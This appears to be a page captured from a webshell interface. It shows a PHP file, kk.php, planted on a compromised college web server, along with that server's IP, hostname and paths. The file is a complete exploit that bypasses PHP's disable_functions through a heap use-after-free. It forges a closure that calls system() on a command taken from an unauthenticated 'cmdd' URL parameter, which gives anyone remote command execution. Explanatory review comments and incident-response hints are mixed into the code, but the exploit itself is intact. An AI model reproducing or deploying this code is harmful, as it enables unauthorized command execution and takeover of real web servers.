403Webshell
Server IP : 27.254.66.5  /  Your IP : 216.73.217.39
Web Server : Apache/2
System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User : technic2 ( 1951)
PHP Version : 7.4.30
Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/technic2/domains/technicrayong.ac.th/public_html/assets/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]


Current File : /home/technic2/domains/technicrayong.ac.th/public_html/assets/css/kk.php
<?php

        /**
         * Plain holder of three public properties. Pwn allocates one of these
         * immediately after freeing a string chunk so that the object lands in
         * the freed slot; the exploit's fixed offsets (0x10, 0x20) presumably
         * correspond to where these three properties sit behind the object header.
         */
        class Helper
        {
            public $a;
            public $b;
            public $c;
        }

        /**
         * disable_functions bypass (PHP 7.x/8.0-era, 64-bit, non-debug zend_alloc).
         *
         * Strategy visible in the code: leak a heap pointer, free the chunk behind a
         * live string ($this->abc), let a Helper object reuse that chunk, and then use
         * the overlapping string as a relative read/write window over the object. From
         * there it reads the closure stored in helper->b, walks backwards from its
         * class entry to the "standard" module's function table, finds zif_system,
         * forges a closure whose handler is zif_system, and calls it with $cmd.
         *
         * NOTE(review): none of the primitives used here (set_error_handler,
         * str_repeat, strlen, pack, closures) appear in the disable_functions list in
         * the banner above; that is the point of the technique. disable_functions is
         * not a privilege boundary - the mitigations that matter are a patched PHP
         * build and process/uid isolation of the vhost, not a longer deny list.
         *
         * Layout assumptions encoded in the constants: a STRING_SIZE string fits a
         * CHUNK_DATA_SIZE bin and a HT_STRING_SIZE string fits the same bin as a
         * HT_SIZE hashtable; the "- 0x18 - 1" presumably accounts for the zend_string
         * header and NUL terminator (not verified here). Debug builds get a larger
         * chunk (ZEND_DEBUG_BUILD branch).
         */
        class Pwn {
            const LOGGING = false;
            const CHUNK_DATA_SIZE = 0x60;
            const CHUNK_SIZE = ZEND_DEBUG_BUILD ? self::CHUNK_DATA_SIZE + 0x20 : self::CHUNK_DATA_SIZE;
            const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1;
            const HT_SIZE = 0x118;
            const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1;
            /**
             * Runs the whole chain and executes $cmd via system(); returns silently
             * (LOGGING is false) if the use-after-free did not line up.
             *
             * $this->abc and $this->helper are undeclared dynamic properties
             * (deprecated in PHP 8.2+).
             *
             * @param string $cmd shell command handed, unescaped, to zif_system.
             */
            public function __construct($cmd) {
                // Heap groom: alternate allocations in the two size bins the
                // exploit depends on so later frees/allocs land predictably.
                for($i = 0; $i < 10; $i++) {
                    $groom[] = self::alloc(self::STRING_SIZE);
                    $groom[] = self::alloc(self::HT_STRING_SIZE);
                }
            // Pointer read from offset 16 of the leaked buffer; presumably the
            // address of the string the interrupted concat was building.
            $concat_str_addr = self::str2ptr($this->heap_leak(), 16);
            // Intentionally unused: occupies the chunk adjacent to the leaked one.
            $fill = self::alloc(self::STRING_SIZE);
    
            // Assumes abc is carved from the chunk right after the leaked string.
            $this->abc = self::alloc(self::STRING_SIZE);
            $abc_addr = $concat_str_addr + self::CHUNK_SIZE;
            self::log("abc @ 0x%x", $abc_addr);
    
            // Free abc's chunk while $this->abc still references it, then have a
            // Helper object reuse the slot. If the object landed there, abc's
            // length field now holds object header bytes and looks huge.
            $this->free($abc_addr);
            $this->helper = new Helper;
            if(strlen($this->abc) < 0x1337) {
                // NOTE(review): the chunk has already been freed at this point,
                // so "bail out" does not mean the worker is left in a sane state.
                self::log("uaf failed");
                return;
            }
    
            // Populate the overlapping object: a gives the read primitive,
            // b is the closure whose pointer gets swapped, c is a marker.
            $this->helper->a = "leet";
            $this->helper->b = function($x) {};
            $this->helper->c = 0xfeedface;
    
            $helper_handlers = $this->rel_read(0);
            self::log("helper handlers @ 0x%x", $helper_handlers);
    
            // Offset 0x20 of abc is read as the real closure's address
            // (presumably helper->b's zval pointer).
            $closure_addr = $this->rel_read(0x20);
            self::log("real closure @ 0x%x", $closure_addr);
    
            $closure_ce = $this->read($closure_addr + 0x10);
            self::log("closure class_entry @ 0x%x", $closure_ce);
            
            $basic_funcs = $this->get_basic_funcs($closure_ce);
            self::log("basic_functions @ 0x%x", $basic_funcs);
    
            // NOTE(review): get_system() returns null if "system" is not in the
            // table; that null is written below as a 0 handler, so a build that
            // compiles out system() likely crashes the worker instead of failing.
            $zif_system = $this->get_system($basic_funcs);
            self::log("zif_system @ 0x%x", $zif_system);
    
            // Build a forged closure inside abc: copy 0x138 bytes of the real
            // closure object, set the 4-byte field at +0x38 to 1 (presumably
            // marking the function as internal), and point the handler field
            // (+0x68 on PHP 7, +0x70 on PHP 8) at zif_system.
            $fake_closure_off = 0x70;
            for($i = 0; $i < 0x138; $i += 8) {
                $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i));
            }
            $this->rel_write($fake_closure_off + 0x38, 1, 4);
            $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
            $this->rel_write($fake_closure_off + $handler_offset, $zif_system);
    
            // +0x18 skips abc's own string header so the pointer hits the copy.
            $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18;
            self::log("fake closure @ 0x%x", $fake_closure_addr);
    
            // Swap helper->b for the forged closure and call it: this is the
            // system($cmd) invocation.
            $this->rel_write(0x20, $fake_closure_addr);
            ($this->helper->b)($cmd);
    
            // Put the real closure pointer back before unset so the engine does
            // not try to destroy the forged object living inside a string.
            $this->rel_write(0x20, $closure_addr);
            unset($this->helper->b);
        }
    
        /**
         * Leak a heap pointer. Concatenating an array onto a string raises an
         * "Array to string conversion" notice; the handler installed here runs in
         * the middle of that concat, drops $arr (freeing its hashtables) and
         * allocates $buf in the same size bin. The intent (per the name and the
         * caller's use of offset 16) is that the engine finishes the concat using
         * already-freed memory and $buf ends up overlapping it - TODO confirm the
         * exact engine path on the target build.
         *
         * @return string buffer of HT_STRING_SIZE bytes, or null if the notice never fired.
         */
        private function heap_leak() {
            $arr = [[], []];
            set_error_handler(function() use (&$arr, &$buf) {
                $arr = 1;
                $buf = str_repeat("\x00", self::HT_STRING_SIZE);
            });
            $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array"));
            return $buf;
        }
    
        /**
         * Free an arbitrary chunk. Same error-handler trick as heap_leak(), but
         * the replacement buffer is a fake header (two marker qwords followed by
         * $addr) padded to HT_STRING_SIZE so it reuses the freed hashtable's bin.
         * Presumably the engine's cleanup of the stale operand then follows the
         * pointer at offset 16 and releases $addr - TODO confirm.
         *
         * @param int $addr heap address whose chunk should be released.
         */
        private function free($addr) {
            $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr);
            $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload));
            
            $arr = [[], []];
            set_error_handler(function() use (&$arr, &$buf, &$payload) {
                $arr = 1;
                $buf = str_repeat($payload, 1);
            });
            $arr[1] .= "x";
        }
    
        /** Read an 8-byte little-endian value at $offset inside $this->abc. */
        private function rel_read($offset) {
            return self::str2ptr($this->abc, $offset);
        }
    
        /**
         * Write $value little-endian into $this->abc, $n bytes wide. Because abc
         * overlaps the Helper object, this is the object-corruption primitive.
         * A null $value is written as zeros (null & 0xff == 0).
         */
        private function rel_write($offset, $value, $n = 8) {
            for ($i = 0; $i < $n; $i++) {
                $this->abc[$offset + $i] = chr($value & 0xff);
                $value >>= 8;
            }
        }
    
        /**
         * Arbitrary read of up to 8 bytes at $addr. Overwrites the pointer at
         * offset 0x10 of abc (presumably helper->a's zend_string pointer) with
         * $addr - 0x10 so that strlen() returns whatever 8 bytes live at $addr;
         * the 0x10 adjustment presumably matches the offset of the length field
         * inside a zend_string. $n < 8 masks the result down.
         */
        private function read($addr, $n = 8) {
            $this->rel_write(0x10, $addr - 0x10);
            $value = strlen($this->helper->a);
            if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
            return $value;
        }
    
        /**
         * Walk the function table in 0x20-byte entries, comparing the first six
         * bytes of each entry's name with "system" (0x6d6574737973 is "system"
         * little-endian); return the handler stored at entry+8.
         *
         * Stops when the entry pointer is 0 and then falls off the end, i.e.
         * returns null when system() is absent.
         */
        private function get_system($basic_funcs) {
            $addr = $basic_funcs;
            do {
                $f_entry = $this->read($addr);
                $f_name = $this->read($f_entry, 6);
                if($f_name === 0x6d6574737973) {
                    return $this->read($addr + 8);
                }
                $addr += 0x20;
            } while($f_entry !== 0);
        }
    
        /**
         * Scan downward from $addr in 0x10 steps for something shaped like a
         * module entry: a 4-byte size of 0xA8 followed by a known module API
         * number, whose name pointer at +0x20 points at "standard"
         * (0x647261646e617473 little-endian). Returns the pointer at +0x28
         * (the module's function table).
         *
         * NOTE(review): while(true) with no bound - if nothing matches before an
         * unmapped page this never returns cleanly; the original comment below
         * describes the resulting SIGSEGV. The API-number list is what the scan
         * accepts; the banner above reports PHP 7.4.30.
         */
        private function get_basic_funcs($addr) {
            while(true) {
                // In rare instances the standard module might lie after the addr we're starting
                // the search from. This will result in a SIGSGV when the search reaches an unmapped page.
                // In that case, changing the direction of the search should fix the crash.
                // $addr += 0x10;
                $addr -= 0x10;
                if($this->read($addr, 4) === 0xA8 &&
                    in_array($this->read($addr + 4, 4),
                        [20180731, 20190902, 20200930, 20210902])) {
                    $module_name_addr = $this->read($addr + 0x20);
                    $module_name = $this->read($module_name_addr);
                    if($module_name === 0x647261646e617473) {
                        self::log("standard module @ 0x%x", $addr);
                        return $this->read($addr + 0x28);
                    }
                }
            }
        }
    
        /**
         * Debug output, compiled out by LOGGING = false. Non-static method called
         * as self::log() from instance context, which PHP allows. $format only
         * ever comes from string constants in this class.
         */
        private function log($format, $val = "") {
            if(self::LOGGING) {
                printf("{$format}\n", $val);
            }
        }
    
        /**
         * Allocate a fresh, non-interned heap string of $size bytes; str_shuffle
         * forces a new allocation rather than a shared literal.
         */
        static function alloc($size) {
            return str_shuffle(str_repeat("A", $size));
        }
    
        /** Decode $n little-endian bytes of $str starting at $p as an integer. */
        static function str2ptr($str, $p = 0, $n = 8) {
            $address = 0;
            for($j = $n - 1; $j >= 0; $j--) {
                $address <<= 8;
                $address |= ord($str[$p + $j]);
            }
            return $address;
        }
    }

    // Webshell trigger: an unauthenticated GET parameter is passed, without any
    // escaping, as the command that Pwn ultimately hands to system(). There is
    // no token or password check, so anyone who can reach kk.php can run
    // commands as the web user. The "$cmdd" interpolation only forces a string
    // cast (an array value becomes "Array" plus a notice).
    // NOTE(review): for incident response, this file path plus a "cmdd=" query
    // string is the access-log indicator to search for; remove the file and
    // rotate the account's credentials rather than trying to harden it.
    if(isset($_GET['cmdd'])){
        $cmdd = ($_GET['cmdd']);
        new Pwn("$cmdd");
    }
?>

Youez - 2016 - github.com/yon3zu
LinuXploit